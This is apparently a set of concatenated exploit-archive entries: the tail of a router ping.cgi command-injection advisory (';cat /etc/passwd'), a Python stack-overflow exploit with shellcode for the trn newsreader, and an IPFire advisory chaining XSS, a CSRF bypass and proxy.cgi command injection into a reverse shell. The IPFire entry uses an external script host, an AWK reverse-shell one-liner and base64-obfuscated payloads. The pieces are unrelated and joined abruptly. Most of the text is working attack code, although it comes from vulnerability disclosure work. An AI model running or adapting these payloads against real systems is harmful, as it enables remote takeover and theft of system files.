http(s)://<victim_IP>/ping.cgi?DIA_IPADDRESS=4.2.2.2;cat%20/etc/passwd
PoC Video: https://www.youtube.com/watch?v=FS43MRG7RDk
Patched/Fixed Firmware and notes:
==========================
ftp://files.planetnetcomm.com/3G10WVE/3G10WVE-L101-S306ETS-C01_R05.bin
NOTE: Verified only by Vendor
Credits:
=======
Bhadresh Patel
Senior Security Analyst
HelpAG (www.helpag.com)
# Exploit developed using Exploit Pack v5.4
# Exploit Author: Juan Sacco - http://www.exploitpack.com - jsacco@exploitpack.com
# Program affected: Threaded USENET news reader
# Version: 3.6-23
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: Threaded USENET news reader, based on rn
# trn is the most widely-used newsreader on USENET
# Kali Linux 2.0 package: pool/non-free/t/trn/trn_3.6-23_i386.deb
# MD5sum: 57782e66c4bf127af0d252db9439fbdf
# Website: https://sourceforge.net/projects/trn/
#
# gdb$ run $(python -c 'print "A"*156+"DCBA"')
# Starting program: /usr/bin/trn $(python -c 'print "A"*156+"DCBA"')
#
# Program received signal SIGSEGV, Segmentation fault.
# --------------------------------------------------------------------------[regs]
# EAX: 0x00000000 EBX: 0x41414141 ECX: 0x00000000 EDX: 0x0809040C o d I t S z a p c
# ESI: 0x41414141 EDI: 0x41414141 EBP: 0x41414141 ESP: 0xBFFFED60 EIP: 0x41424344
# CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while running hook_stop:
# Cannot access memory at address 0x41424344
# 0x41424344 in ?? ()
import os, subprocess
def run():
try:
print "# TRN Threaded Reader - Stack Buffer Overflow by Juan Sacco"
print "# This Exploit has been developed using Exploit Pack"
# NOPSLED + SHELLCODE + EIP
buffersize = 160
nopsled = "\x90"*132
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
eip = "\xd0\xec\xff\xbf"
buffer = nopsled * (buffersize-len(shellcode)) + eip
subprocess.call(["trn ",' ', buffer])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, Threaded Reader - Not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit TRN 3.6-23 Local Overflow Exploit"
print "Author: Juan Sacco - Exploit Pack"
except IndexError:
howtousage()
run()
######################################################################################
# Exploit Title: IPFire < 2.19 Update Core 101 XSS to CSRF to Remote Command Execution
# Date: 04/05/2016
# Author: Yann CAM @ Synetis - ASafety
# Vendor or Software Link: www.ipfire.org
# Version: lesser-than 2.19 Core Update 101
# Category: Remote Command Execution / XSS
# Google dork:
# Tested on: IPFire distribution
######################################################################################
IPFire firewall/router distribution description :
======================================================================
IPFire is a free Linux distribution which acts as a router and firewall in the first instance. It can be maintained via
a web interface. The distribution furthermore offers selected server daemons and can easily be expanded to a SOHO server.
IPFire is based on Linux From Scratch and is, like the Endian Firewall, originally a fork from IPCop. Since Version 2,
only IPCop's web interface is used.
Vulnerability description :
======================================================================
As others linux-router based firewall that I've tested and analyzed, IPFire (based on IPCop) have some vulnerabilities.
Through an XSS, it's possible to bypass CSRF-referer checking and exploit a Remote Command Execution to gain a full reverse-shell.
The method detailed below is very similar to the one presented in my previous article for IPCop some year ago.
IPCop 2.1.4 Remote Command Execution : https://www.asafety.fr/vuln-exploit-poc/xss-rce-ipcop-2-1-4-remote-command-execution/
Proof of Concept 1 :
======================================================================
A non-persistent XSS in GET param is available in the ipinfo.cgi. The injection can be URLencoded with certain browsers
or blocked with Anti-XSS engine.
This XSS works on IE and affect IPFire version < 2.19 Core Update 101.
File /srv/web/ipfire/cgi-bin/ipinfo.cgi line 87 :
&Header::openbox('100%', 'left', $addr . ' (' . $hostname . ') : '.$whoisname);
PoC:
https://<IPFire>:444/cgi-bin/ipinfo.cgi?<script>alert(/RXSS-Yann_CAM_-_Security_Consultant_@ASafety_-_SYNETIS/)</script>
Proof of Concept 2 :
======================================================================
CSRF exploit bypass from previous XSS.
IPFire is protected against CSRF attack with a referer checking on all page.
It's possible to bypass this protection with the previous XSS detailed.
To do this, load a third party JS script with the XSS, and make Ajax request over IPFire context (so with the right referer).
This XSS works on IE and affect IPFire version < 2.19 Core Update 101.
File /srv/web/ipfire/cgi-bin/ipinfo.cgi line 87 :
&Header::openbox('100%', 'left', $addr . ' (' . $hostname . ') : '.$whoisname);
PoC :
Host a third party JS script on a web server accessible from IPFire. In this JS script, load JQuery dynamically and perform any AJAX request to an IPFire targeted page.
All AJAX request bypass the CSRF protection.
* Third party JS script, host in http://<PENTESTER_WEBSITE>/x.js:
var headx=document.getElementsByTagName('head')[0];
var jq= document.createElement('script');
jq.type= 'text/javascript';
jq.src= 'http://code.jquery.com/jquery-latest.min.js';
headx.appendChild(jq);
function loadX(){ // AJAX CSRF bypass referer checking !
$.ajax({
type: 'POST',
url: "https://<IPFire_IP>:444/cgi-bin/<TARGETED_PAGE>",
contentType: 'application/x-www-form-urlencoded;charset=utf-8',
dataType: 'text',
data: '<YOUR_DATA>'
}); // payload of your choice
}
setTimeout("loadX()",2000);
* XSS to load dynamically this third party script :
var head=document.getElementsByTagName('head')[0];var script= document.createElement('script');script.type= 'text/javascript';script.src= 'http://<PENTESTER_WEBSITE>/x.js';head.appendChild(script);
* Escape this string with escape() Javascript method :
%76%61%72%20%68%65%61%64%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%5B%30%5D%3B%76%61%72%20%73%63%72%69%70%74%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%73%63%72%69%70%74%2E%74%79%70%65%3D%20%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%3B%73%63%72%69%70%74%2E%73%72%63%3D%20%27%68%74%74%70%3A%2F%2F%31%39%32%2E%31%36%38%2E%31%35%33%2E%31%2F%78%2E%6A%73%27%3B%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0A%09%09%09
* Make the final URL with XSS in GET param that load dynamically the third party script (IE) :
https://<IPFire_IP>:8443/cgi-bin/ipinfo.cgi?<script>eval(unescape("%76%61%72%20%68%65%61%64%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%5B%30%5D%3B%76%61%72%20%73%63%72%69%70%74%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%73%63%72%69%70%74%2E%74%79%70%65%3D%20%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%3B%73%63%72%69%70%74%2E%73%72%63%3D%20%27%68%74%74%70%3A%2F%2F%31%39%32%2E%31%36%38%2E%31%35%33%2E%31%2F%78%2E%6A%73%27%3B%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0A%09%09%09"))</script>
Proof of Concept 3 :
======================================================================
Remote Command Execution in the proxy.cgi file. This file is protected from CSRF execution.
Affected version < 2.19 Core Update 101.
File /srv/web/ipfire/cgi-bin/proxy.cgi line 4137 :
system("/usr/sbin/htpasswd -b $userdb $str_user $str_pass");
The $str_pass isn't sanitized before execution in command line. It's possible to change the "NCSA_PASS" and "NCSA_PASS_CONFIRM" post data with arbitrary data.
So the RCE can be exploited with this PoC (if the Referer is defined to IPFire URL) :
<html>
<body>
<form name='x' action='https://<IPFire_IP>:444/cgi-bin/proxy.cgi' method='post'>
<input type='hidden' name='NCSA_PASS' value='||touch /tmp/x;#' />
<input type='hidden' name='NCSA_PASS_CONFIRM' value='||touch /tmp/x;#' />
<input type='hidden' name='NCSA_USERNAME' value='yanncam' />
<input type='hidden' name='ACTION' value='Ajouter' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>
Note that the ACTION POST param depend on the IPFire language defined.
Proof of Concept 4 :
======================================================================
Finally, with these three previous PoC, it's possible to combine all the mechanisms to gain a full reverse-shell on IPFire.
IPFire does not have netcat nor telnet, socat, python, ruby, php etc ...
The only way to make a reverse-shell is to use Perl or AWK technics. In this PoC, it's the AWK technic that is used :
(From ASafety Reverse-shell cheat-sheet : http://www.asafety.fr/vuln-exploit-poc/pentesting-etablir-un-reverse-shell-en-une-ligne/)
* The reverse-shell one-line with AWK is :
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
* To bypass IPFire filter, you need to encode this command in base64 (after modify <IP> and <PORT>) :
YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWxlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIGM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8JiBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsgfX0nIC9kZXYvbnVsbA==
* Place a \n at each bloc of 64 chars in the base64 version :
YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==
* This payload can be echo'ed and decoded with openssl, on the fly, into IPFire :
echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d
* To execute this payload, add backticks and eval call :
eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d`
* Your payload is ready to be used into POST param in proxy.cgi, like the previous PoC :
||eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d`;#
* Full PoC (IPFire < 2.19 Core Update 101)
(if the referer is defined to IPFire URL, and a netcat is listening # nc -l -vv -p 1337) :
<html>
<body>
<form name='x' action='https://<IPFire_IP>:444/cgi-bin/proxy.cgi' method='post'>
<input type='hidden' name='NCSA_PASS' value='||eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC8xOTIuMTY4LjAuMi8xMzM3Ijsg\nd2hpbGUoNDIpIHsgZG97IHByaW50ZiAic2hlbGw+IiB8JiBzOyBzIHwmIGdldGxp\nbmUgYzsgaWYoYyl7IHdoaWxlICgoYyB8JiBnZXRsaW5lKSA+IDApIHByaW50ICQw\nIHwmIHM7IGNsb3NlKGMpOyB9IH0gd2hpbGUoYyAhPSAiZXhpdCIpIGNsb3NlKHMp\nOyB9fScgL2Rldi9udWxs" | openssl enc -a -d`;#' />
<input type='hidden' name='NCSA_PASS_CONFIRM' value='||eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC8xOTIuMTY4LjAuMi8xMzM3Ijsg\nd2hpbGUoNDIpIHsgZG97IHByaW50ZiAic2hlbGw+IiB8JiBzOyBzIHwmIGdldGxp\nbmUgYzsgaWYoYyl7IHdoaWxlICgoYyB8JiBnZXRsaW5lKSA+IDApIHByaW50ICQw\nIHwmIHM7IGNsb3NlKGMpOyB9IH0gd2hpbGUoYyAhPSAiZXhpdCIpIGNsb3NlKHMp\nOyB9fScgL2Rldi9udWxs" | openssl enc -a -d`;#' />
<input type='hidden' name='NCSA_USERNAME' value='yanncam' />
<input type='hidden' name='ACTION' value='Ajouter' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>
Note that none <IP>/<Port> are defined in the previous payload, you need to reproduce these different steps.
* With the XSS method to bypass CSRF Referer checking, the third party JS script can be :
var headx=document.getElementsByTagName('head')[0];
var jq= document.createElement('script');
jq.type= 'text/javascript';
jq.src= 'http://code.jquery.com/jquery-latest.min.js';
headx.appendChild(jq);
function loadX(){ // AJAX CSRF bypass referer checking !
$.ajax({
type: 'POST',
url: "https://<IPFire_IP>:444/cgi-bin/proxy.cgi",
contentType: 'application/x-www-form-urlencoded;charset=utf-8',
dataType: 'text',
data: 'NCSA_USERNAME=yanncam&ACTION=Ajouter&NCSA_PASS=||eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC8xOTIuMTY4LjEuMzIvMTMzNyI7\nIHdoaWxlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRs\naW5lIGM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAk\nMCB8JiBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShz\nKTsgfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d`;#&NCSA_PASS_CONFIRM=||eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC8xOTIuMTY4LjEuMzIvMTMzNyI7\nIHdoaWxlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRs\naW5lIGM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAk\nMCB8JiBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShz\nKTsgfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d`;#'
});
}
setTimeout("loadX()",2000);
* A demonstration video has been realised as PoC here (IPFire < 2.19 Core Update 101) : https://www.youtube.com/watch?v=rBd21aXU83E
Solution:
======================================================================
- Upgrade to IPFire 2.19 Core Update 101
I just want to thank Michael TREMER for his availability, his kindness, his correction speed and quality of the IPFire project I am a regular user.
Report timeline :
======================================================================
2016-04-03 : Vulnerabilities discovered in the latest IPFire version
2016-04-04 : IPFire team alerted with details and PoC through forum and bugtracker
2016-04-05 : Several exchanges between Michael TREMER and me on the BugTracker to fix these vulnerabilities
2016-04-05 : CVE assigment request sent by IPFire team
2016-04-06 : CVE ID denied without any reason, emailed back
2016-04-08 : CVE ID denied again without any reason
2016-04-27 : IPFire 2.19 Core Update 101 available for testing
2016-05-02 : IPFire 2.19 Core Update 101 released
Additional resources :
======================================================================
- www.ipfire.org
- www.ipfire.org/news/ipfire-2-19-core-update-101-released
- planet.ipfire.org/post/ipfire-2-19-core-update-101-is-available-for-testing
- www.ubuntufree.com/ipfire-2-19-core-update-101-patches-cross-site-scripting-vulnerability-in-web-ui/
- news.softpedia.com/news/ipfire-2-19-core-update-101-patches-cross-site-scripting-vulnerability-in-web-ui-503608.shtml
- www.openwall.com/lists/oss-security/2016/04/05/5
- seclists.org/oss-sec/2016/q2/15
- www.synetis.com
- www.asafety.fr
- www.youtube.com/watch?v=rBd21aXU83E
Credits :
======================================================================
88888888
88 888 88 88
888 88 88
788 Z88 88 88.888888 8888888 888888 88 8888888.
888888. 88 88 888 Z88 88 88 88 88 88 88
8888888 88 88 88 88 88 88 88 88 888
888 88 88 88 88 88888888888 88 88 888888
88 88 88 8. 88 88 88 88 88 888
888 ,88 8I88 88 88 88 88 88 88 .88 .88
?8888888888. 888 88 88 88888888 8888 88 =88888888
888. 88
88 www.synetis.com
8888 Consulting firm in management and information security
Yann CAM - Security Consultant @ Synetis | ASafety
--
SYNETIS | ASafety
CONTACT: www.synetis.com | www.asafety.fr